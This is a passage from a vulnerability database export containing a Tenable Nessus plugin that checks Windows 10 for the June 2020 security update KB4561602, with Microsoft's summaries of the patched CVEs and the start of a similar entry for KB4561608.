"CVE-2020-1160", "CVE-2020-1162", "CVE-2020-1194", "CVE-2020-1196", "CVE-2020-1197", "CVE-2020-1199", "CVE-2020-1201", "CVE-2020-1202", "CVE-2020-1203", "CVE-2020-1207", "CVE-2020-1208", "CVE-2020-1211", "CVE-2020-1212", "CVE-2020-1213", "CVE-2020-1214", "CVE-2020-1215", "CVE-2020-1216", "CVE-2020-1217", "CVE-2020-1219", "CVE-2020-1220", "CVE-2020-1222", "CVE-2020-1230", "CVE-2020-1231", "CVE-2020-1232", "CVE-2020-1233", "CVE-2020-1234", "CVE-2020-1235", "CVE-2020-1236", "CVE-2020-1237", "CVE-2020-1238", "CVE-2020-1239", "CVE-2020-1241", "CVE-2020-1246", "CVE-2020-1247", "CVE-2020-1251", "CVE-2020-1253", "CVE-2020-1254", "CVE-2020-1255", "CVE-2020-1257", "CVE-2020-1258", "CVE-2020-1259", "CVE-2020-1260", "CVE-2020-1261", "CVE-2020-1262", "CVE-2020-1263", "CVE-2020-1264", "CVE-2020-1266", "CVE-2020-1269", "CVE-2020-1270", "CVE-2020-1271", "CVE-2020-1272", "CVE-2020-1278", "CVE-2020-1279", "CVE-2020-1280", "CVE-2020-1281", "CVE-2020-1282", "CVE-2020-1283", "CVE-2020-1286", "CVE-2020-1287", "CVE-2020-1290", "CVE-2020-1291", "CVE-2020-1293", "CVE-2020-1294", "CVE-2020-1299", "CVE-2020-1300", "CVE-2020-1301", "CVE-2020-1302", "CVE-2020-1304", "CVE-2020-1305", "CVE-2020-1309", "CVE-2020-1310", "CVE-2020-1311", "CVE-2020-1312", "CVE-2020-1314", "CVE-2020-1315", "CVE-2020-1316", "CVE-2020-1317", "CVE-2020-1324", "CVE-2020-1334", "CVE-2020-1348"], "modified": "2023-03-06T00:00:00", "cpe": ["cpe:/o:microsoft:windows", "cpe:/a:microsoft:edge"], "id": "SMB_NT_MS20_JUN_4561602.NASL", "href": "https://www.tenable.com/plugins/nessus/137255", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(137255);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/03/06\");\n\n script_cve_id(\n \"CVE-2020-0915\",\n \"CVE-2020-0916\",\n \"CVE-2020-0986\",\n \"CVE-2020-1073\",\n \"CVE-2020-1160\",\n \"CVE-2020-1162\",\n \"CVE-2020-1194\",\n \"CVE-2020-1196\",\n \"CVE-2020-1197\",\n \"CVE-2020-1199\",\n \"CVE-2020-1201\",\n \"CVE-2020-1202\",\n \"CVE-2020-1203\",\n \"CVE-2020-1207\",\n \"CVE-2020-1208\",\n \"CVE-2020-1211\",\n \"CVE-2020-1212\",\n \"CVE-2020-1213\",\n \"CVE-2020-1214\",\n \"CVE-2020-1215\",\n \"CVE-2020-1216\",\n \"CVE-2020-1217\",\n \"CVE-2020-1219\",\n \"CVE-2020-1220\",\n \"CVE-2020-1222\",\n \"CVE-2020-1230\",\n \"CVE-2020-1231\",\n \"CVE-2020-1232\",\n \"CVE-2020-1233\",\n \"CVE-2020-1234\",\n \"CVE-2020-1235\",\n \"CVE-2020-1236\",\n \"CVE-2020-1237\",\n \"CVE-2020-1238\",\n \"CVE-2020-1239\",\n \"CVE-2020-1241\",\n \"CVE-2020-1246\",\n \"CVE-2020-1247\",\n \"CVE-2020-1251\",\n \"CVE-2020-1253\",\n \"CVE-2020-1254\",\n \"CVE-2020-1255\",\n \"CVE-2020-1257\",\n \"CVE-2020-1258\",\n \"CVE-2020-1259\",\n \"CVE-2020-1260\",\n \"CVE-2020-1261\",\n \"CVE-2020-1262\",\n \"CVE-2020-1263\",\n \"CVE-2020-1264\",\n \"CVE-2020-1266\",\n \"CVE-2020-1269\",\n \"CVE-2020-1270\",\n \"CVE-2020-1271\",\n \"CVE-2020-1272\",\n \"CVE-2020-1278\",\n \"CVE-2020-1279\",\n \"CVE-2020-1280\",\n \"CVE-2020-1281\",\n \"CVE-2020-1282\",\n \"CVE-2020-1283\",\n \"CVE-2020-1286\",\n \"CVE-2020-1287\",\n \"CVE-2020-1290\",\n \"CVE-2020-1291\",\n \"CVE-2020-1293\",\n \"CVE-2020-1294\",\n \"CVE-2020-1299\",\n \"CVE-2020-1300\",\n \"CVE-2020-1301\",\n \"CVE-2020-1302\",\n \"CVE-2020-1304\",\n \"CVE-2020-1305\",\n \"CVE-2020-1309\",\n \"CVE-2020-1310\",\n \"CVE-2020-1311\",\n \"CVE-2020-1312\",\n \"CVE-2020-1314\",\n \"CVE-2020-1315\",\n \"CVE-2020-1316\",\n \"CVE-2020-1317\",\n \"CVE-2020-1324\",\n \"CVE-2020-1334\",\n \"CVE-2020-1348\"\n );\n script_xref(name:\"MSKB\", value:\"4561602\");\n script_xref(name:\"MSFT\", value:\"MS20-4561602\");\n script_xref(name:\"IAVA\", value:\"2020-A-0247-S\");\n script_xref(name:\"IAVA\", value:\"2020-A-0256-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0051\");\n\n script_name(english:\"KB4561602: Windows 10 Version 1709 June 2020 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4561602.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in the\n way that the printconfig.dll handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1196)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2020-1348)\n\n - An information disclosure vulnerability exists when the\n win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-1290)\n\n - A remote code execution vulnerability exists when\n Microsoft Windows OLE fails to properly validate user\n input. An attacker could exploit the vulnerability to\n execute malicious code. (CVE-2020-1281)\n\n - An information disclosure vulnerability exists in the\n way Windows Error Reporting (WER) handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2020-1261,\n CVE-2020-1263)\n\n - An elevation of privilege vulnerability exists when the\n Windows Background Intelligent Transfer Service (BITS)\n IIS module improperly handles uploaded content. An\n attacker who successfully exploited this vulnerability\n could upload restricted file types to an IIS-hosted\n folder. (CVE-2020-1255)\n\n - An elevation of privilege vulnerability exists in the\n way that the wlansvc.dll handles objects in memory. An\n attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1270)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Network Connections Service handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2020-1291)\n\n - An elevation of privilege vulnerability exists when the\n Windows Runtime improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could run arbitrary code in an elevated context. An\n attacker could exploit this vulnerability by running a\n specially crafted application on the victim system. The\n update addresses the vulnerability by correcting the way\n the Windows Runtime handles objects in memory.\n (CVE-2020-1231, CVE-2020-1233, CVE-2020-1235,\n CVE-2020-1282, CVE-2020-1304, CVE-2020-1334)\n\n - A memory corruption vulnerability exists when Windows\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could install programs; view, change, or delete data; or\n create new accounts with full user rights. There are\n multiple ways an attacker could exploit the\n vulnerability, such as by convincing a user to open a\n specially crafted document, or by convincing a user to\n visit a malicious webpage. The security update addresses\n the vulnerability by correcting how Windows Media\n Foundation handles objects in memory. (CVE-2020-1238,\n CVE-2020-1239)\n\n - An elevation of privilege vulnerability exists when the\n Windows Feedback Hub improperly handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. (CVE-2020-1199)\n\n - An elevation of privilege vulnerability exists when the\n Diagnostics Hub Standard Collector or the Visual Studio\n Standard Collector fail to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. (CVE-2020-1202, CVE-2020-1203)\n\n - An elevation of privilege vulnerability exists in\n Windows Installer because of the way Windows Installer\n handles certain filesystem operations. (CVE-2020-1302,\n CVE-2020-1312)\n\n - An elevation of privilege vulnerability exists in the\n way the Windows Now Playing Session Manager handles\n objects in memory. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. An attacker could then install\n programs; view, change or delete data. (CVE-2020-1201)\n\n - An elevation of privilege vulnerability exists when the\n Windows Backup Service improperly handles file\n operations. (CVE-2020-1271)\n\n - An elevation of privilege vulnerability exists in the\n way that the Connected Devices Platform Service handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2020-1211)\n\n - A security feature bypass vulnerability exists when\n Windows Kernel fails to properly sanitize certain\n parameters. (CVE-2020-1241)\n\n - An elevation of privilege vulnerability exists when the\n Diagnostics Hub Standard Collector Service improperly\n handles file operations. An attacker who successfully\n exploited this vulnerability could gain elevated\n privileges. An attacker with unprivileged access to a\n vulnerable system could exploit this vulnerability. The\n security update addresses the vulnerability by ensuring\n the Diagnostics Hub Standard Collector Service properly\n handles file operations. (CVE-2020-1257, CVE-2020-1278,\n CVE-2020-1293)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Bluetooth Service handles objects\n in memory. An attacker who successfully exploited the\n vulnerability could execute code with elevated\n permissions. (CVE-2020-1280)\n\n - An elevation of privilege vulnerability exists in the\n Windows Installer when the Windows Installer fails to\n properly sanitize input leading to an insecure library\n loading behavior. A locally authenticated attacker could\n run arbitrary code with elevated system privileges. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. The security update addresses the vulnerability\n by correcting the input sanitization error to preclude\n unintended elevation. (CVE-2020-1272)\n\n - An information disclosure vulnerability exists when the\n Windows Runtime improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could read memory that was freed and might run arbitrary\n code in an elevated context. An attacker could exploit\n this vulnerability by running a specially crafted\n application on the victim system. The update addresses\n the vulnerability by correcting the way the Windows\n Runtime handles objects in memory. (CVE-2020-1217)\n\n - An information disclosure vulnerability exists when\n Internet Explorer improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-1315)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows WalletService handles objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute code with elevated\n permissions. (CVE-2020-1287, CVE-2020-1294)\n\n - A remote code execution vulnerability exists when\n Microsoft Windows fails to properly handle cabinet\n files. (CVE-2020-1300)\n\n - An elevation of privilege (user to user) vulnerability\n exists in Windows Security Health Service when handling\n certain objects in memory. (CVE-2020-1162,\n CVE-2020-1324)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2020-1213, CVE-2020-1214,\n CVE-2020-1215, CVE-2020-1216, CVE-2020-1230,\n CVE-2020-1260)\n\n - An elevation of privilege vulnerability exists when the\n Microsoft Store Runtime improperly handles memory.\n (CVE-2020-1222, CVE-2020-1309)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft browsers access objects in memory. The\n vulnerability could corrupt memory in a way that could\n allow an attacker to execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2020-1219)\n\n - A denial of service vulnerability exists when Windows\n Registry improperly handles filesystem operations. An\n attacker who successfully exploited the vulnerability\n could cause a denial of service against a system.\n (CVE-2020-1194)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows that could allow remote code execution\n if a .LNK file is processed. An attacker who\n successfully exploited this vulnerability could gain the\n same user rights as the local user. (CVE-2020-1299)\n\n - An information disclosure vulnerability exists when the\n Microsoft Windows Graphics Component improperly handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. (CVE-2020-1160)\n\n - A remote code execution vulnerability exists in the way\n that the ChakraCore scripting engine handles objects in\n memory. The vulnerability could corrupt memory in such a\n way that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2020-1073)\n\n - An elevation of privilege vulnerability exists when the\n Windows State Repository Service improperly handles\n objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n an elevated context. An attacker could exploit this\n vulnerability by running a specially crafted application\n on the victim system. The update addresses the\n vulnerability by correcting the way the Windows State\n Repository Service handles objects in memory.\n (CVE-2020-1305)\n\n - A security feature bypass vulnerability exists when\n Windows Host Guardian Service improperly handles hashes\n recorded and logged. An attacker who successfully\n exploited the vulnerability could tamper with the log\n file. In an attack scenario, an attacker can change\n existing event log types to a type the parsers do not\n interpret allowing an attacker to append their own hash\n without triggering an alert. The update addresses the\n vulnerability by correcting how Windows Host Guardian\n Service handles logging of the measured boot hash.\n (CVE-2020-1259)\n\n - A remote code execution vulnerability exists in the way\n that the Microsoft Server Message Block 1.0 (SMBv1)\n server handles certain requests. An attacker who\n successfully exploited the vulnerability could gain the\n ability to execute code on the target server.\n (CVE-2020-1301)\n\n - An elevation of privilege vulnerability exists when\n Windows Error Reporting manager improperly handles a\n process crash. An attacker who successfully exploited\n this vulnerability could delete a targeted file leading\n to an elevated status. (CVE-2020-1197)\n\n - An elevation of privilege vulnerability exists when an\n OLE Automation component improperly handles memory.\n (CVE-2020-1212)\n\n - An elevation of privilege vulnerability exists when\n Group Policy improperly checks access. An attacker who\n successfully exploited this vulnerability could run\n processes in an elevated context. (CVE-2020-1317)\n\n - An elevation of privilege vulnerability exists when\n Windows Lockscreen fails to properly load spotlight\n images from a secure location. An attacker who\n successfully exploited the vulnerability could execute\n commands with elevated permissions. An authenticated\n attacker could modify a registry value to exploit this\n vulnerability. The security update addresses the\n vulnerability by ensuring that the spotlight images are\n always loaded from a secure location. (CVE-2020-1279)\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. (CVE-2020-1208, CVE-2020-1236)\n\n - An elevation of privilege vulnerability exists when the\n Windows kernel fails to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. (CVE-2020-0986, CVE-2020-1246, CVE-2020-1262,\n CVE-2020-1264, CVE-2020-1266, CVE-2020-1269,\n CVE-2020-1316)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Graphics Device Interface (GDI)\n handles objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2020-0915, CVE-2020-0916)\n\n - An elevation of privilege vulnerability exists when\n Windows Modules Installer Service improperly handles\n class object members. A locally authenticated attacker\n could run arbitrary code with elevated system\n privileges. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. The update addresses the\n vulnerability by correcting how Windows handles calls to\n preclude unintended elevation. (CVE-2020-1254)\n\n - An elevation of privilege vulnerability exists when\n Component Object Model (COM) client uses special case\n IIDs. An attacker who successfully exploited this\n vulnerability could run arbitrary code with elevated\n system privileges. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2020-1311)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Windows kernel-mode driver fails to\n properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code in kernel mode. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2020-1207, CVE-2020-1247, CVE-2020-1251,\n CVE-2020-1253, CVE-2020-1310)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Kernel handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1237)\n\n - A denial of service vulnerability exists when Windows\n improperly handles objects in memory. An attacker who\n successfully exploited the vulnerability could cause a\n target system to stop responding. (CVE-2020-1283)\n\n - An elevation of privilege vulnerability exists when\n Windows Error Reporting improperly handles objects in\n memory. (CVE-2020-1234)\n\n - A spoofing vulnerability exists when theMicrosoft Edge\n (Chromium-based) in IE Mode improperly handles specific\n redirects. An attacker who successfully exploits the IE\n Mode vulnerability could trick a user into believing\n that the user was on a legitimate website. The specially\n crafted website could either spoof content or serve as a\n pivot to chain an attack with other vulnerabilities in\n web services. (CVE-2020-1220)\n\n - An information disclosure vulnerability exists when\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2020-1232)\n\n - A remote code execution vulnerability exists when the\n Windows Shell does not properly validate file paths. An\n attacker who successfully exploited this vulnerability\n could run arbitrary code in the context of the current\n user. If the current user is logged on as an\n administrator, an attacker could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with elevated privileges. Users whose accounts\n are configured to have fewer privileges on the system\n could be less impacted than users who operate with\n administrative privileges. (CVE-2020-1286)\n\n - An elevation of privilege vulnerability exists in\n Windows Text Service Framework (TSF) when the TSF server\n fails to properly handle messages sent from TSF clients.\n An attacker who successfully exploited this\n vulnerability could run arbitrary code in a privileged\n process. An attacker could then install programs; view,\n change, or delete data; or create new accounts with full\n user rights. (CVE-2020-1314)\n\n - An elevation of privilege vulnerability exists when\n DirectX improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could run arbitrary code in kernel mode. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2020-1258)\");\n # https://support.microsoft.com/en-us/help/4561602/windows-10-update-kb4561602\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?506489a5\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4561602.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-1299\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2020-1317\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/06/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/06/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/06/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:edge\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\ninclude('install_func.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS20-06';\nkbs = make_list(\n '4561602'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n sp:0,\n os_build:'16299',\n rollup_date:'06_2020',\n bulletin:bulletin,\n rollup_kb_list:[4561602])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:02:30", "description": "The remote Windows host is missing security update 4561608.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in the way that the wlansvc.dll handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions.\n (CVE-2020-1270)\n\n - An elevation of privilege vulnerability exists when the Windows Backup Service improperly handles file operations. (CVE-2020-1271)\n\n - An information disclosure vulnerability exists when the Windows GDI component improperly discloses the contents of its memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by correcting how the Windows GDI component handles objects in memory. (CVE-2020-1348)\n\n - A vulnerability exists in the way the Windows Diagnostics & feedback settings app handles objects in memory. An attacker who successfully exploited this vulnerability could cause additional diagnostic data from the affected device to be sent to Microsoft.\n (CVE-2020-1296)\n\n - An information disclosure vulnerability exists when the win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2020-1290)\n\n - A remote code execution vulnerability exists when Microsoft Windows OLE fails to properly validate user input. An attacker could exploit the vulnerability to execute malicious code. (CVE-2020-1281)\n\n - An information disclosure vulnerability exists in the way Windows Error Reporting (WER) handles objects in memory. An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. (CVE-2020-1261, CVE-2020-1263)\n\n - An elevation of privilege vulnerability exists when the Windows Background Intelligent Transfer Service (BITS) IIS module improperly handles uploaded content. An attacker who successfully exploited this vulnerability could upload restricted file types to an IIS-hosted folder. (CVE-2020-1255)\n\n - An elevation of privilege vulnerability exists when Windows Error Reporting manager improperly handles a process crash. An attacker who successfully exploited this vulnerability could delete a targeted file leading to an elevated status. (CVE-2020-1197)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Network Connections Service handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-1291)\n\n - A memory corruption vulnerability exists when Windows Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability could install programs; view, change, or delete data; or create new accounts with full user rights. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit a malicious webpage. The security update addresses the vulnerability by correcting how Windows Media Foundation handles objects in memory. (CVE-2020-1238, CVE-2020-1239)\n\n - An elevation of privilege vulnerability exists when the Diagnostics Hub Standard Collector or the Visual Studio Standard Collector fail to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run processes in an elevated context. (CVE-2020-1202, CVE-2020-1203)\n\n - An elevation of privilege vulnerability exists when Windows Mobile Device Management (MDM) Diagnostics improperly handles junctions. An attacker who successfully exploited this vulnerability could bypass access restrictions to delete files. (CVE-2020-1204)\n\n - An elevation of privilege vulnerability exists in the way the Windows Now Playing Session Manager handles objects in memory. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could then install programs; view, change or delete data. (CVE-2020-1201)\n\n - A denial of service vulnerability exists when Windows improperly handles objects in memory. An attacker who successfully exploited the vulnerability could cause a target system to stop responding. (CVE-2020-1283)\n\n - A remote code execution vulnerability exists when the Windows Jet Database Engine improperly handles objects in memory. An attacker who successfully exploited this vulnerability could execute arbitrary code on a victim system. An attacker could exploit this vulnerability by enticing a victim to open a specially crafted file. The update addresses the vulnerability by correcting the way the Windows Jet Database Engine handles objects in memory. (CVE-2020-1208, CVE-2020-1236)\n\n - An elevation of privilege vulnerability exists in the way that the Connected Devices Platform Service handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-1211)\n\n - A security feature bypass vulnerability exists when Windows Kernel fails to properly sanitize certain parameters. (CVE-2020-1241)\n\n - An elevation of privilege vulnerability exists when the Diagnostics Hub Standard Collector Service improperly handles file operations. An attacker who successfully exploited this vulnerability could gain elevated privileges. An attacker with unprivileged access to a vulnerable system could exploit this vulnerability. The security update addresses the vulnerability by ensuring the Diagnostics Hub Standard Collector Service properly handles file operations. (CVE-2020-1257, CVE-2020-1278, CVE-2020-1293)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Bluetooth Service handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-1280)\n\n - An elevation of privilege vulnerability exists in the Windows Installer when the Windows Installer fails to properly sanitize input leading to an insecure library loading behavior. A locally authenticated attacker could run arbitrary code with elevated system privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. The security update addresses the vulnerability by correcting the input sanitization error to preclude unintended elevation. (CVE-2020-1272)\n\n - An information disclosure vulnerability exists when the Windows Runtime improperly handles objects in memory. An attacker who successfully exploited this vulnerability could read memory that was freed and might run arbitrary code in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows Runtime handles objects in memory. (CVE-2020-1217)\n\n - An information disclosure vulnerability exists when Internet Explorer improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2020-1315)\n\n - An elevation of privilege vulnerability exists in the way that the Windows WalletService handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-1287, CVE-2020-1294)\n\n - A remote code execution vulnerability exists when Microsoft Windows fails to properly handle cabinet files. (CVE-2020-1300)\n\n - An elevation of privilege (user to user) vulnerability exists in Windows Security Health Service when handling certain objects in memory. (CVE-2020-1162, CVE-2020-1324)\n\n - A remote code execution vulnerability exists in the way that the VBScript engine handles objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2020-1213, CVE-2020-1214, CVE-2020-1215, CVE-2020-1216, CVE-2020-1230, CVE-2020-1260)\n\n - An elevation of privilege vulnerability exists when the Windows Runtime improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows Runtime handles objects in memory.\n (CVE-2020-1231, CVE-2020-1233, CVE-2020-1235, CVE-2020-1282, CVE-2020-1304, CVE-2020-1306, CVE-2020-1334)\n\n - An elevation of privilege vulnerability exists when the Microsoft Store Runtime improperly handles memory.\n (CVE-2020-1222, CVE-2020-1309)\n\n - A remote code execution vulnerability exists in the way that Microsoft browsers access objects in memory. The vulnerability could corrupt memory in a way that could allow an attacker to execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2020-1219)\n\n - A denial of service vulnerability exists when Windows Registry improperly handles filesystem operations. An attacker who successfully exploited the vulnerability could cause a denial of service against a system.\n (CVE-2020-1194)\n\n - A remote code execution vulnerability exists in Microsoft Windows that could allow remote code execution if a .LNK file is processed. An attacker who successfully exploited this vulnerability could gain the same user rights as the local user. (CVE-2020-1299)\n\n - An information disclosure vulnerability exists when the Microsoft Windows Graphics Component improperly handles objects in memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2020-1160)\n\n - A remote code execution vulnerability exists in the way that the ChakraCore scripting engine handles objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2020-1073)\n\n - An elevation of privilege vulnerability exists when the Windows State Repository Service improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows State Repository Service handles objects in memory.\n (CVE-2020-1305)\n\n - A security feature bypass vulnerability exists when Windows Host Guardian Service improperly handles hashes recorded and logged. An attacker who successfully exploited the vulnerability could tamper with the log file. In an attack scenario, an attacker can change existing event log types to a type the parsers do not interpret allowing an attacker to append their own hash without triggering an alert. The update addresses the vulnerability by correcting how Windows Host Guardian Service handles logging of the measured boot hash.\n (CVE-2020-1259)\n\n - An elevation of privilege vulnerability exists when the Windows kernel fails to properly handle objects in memory. An attacker who successfully exploited this 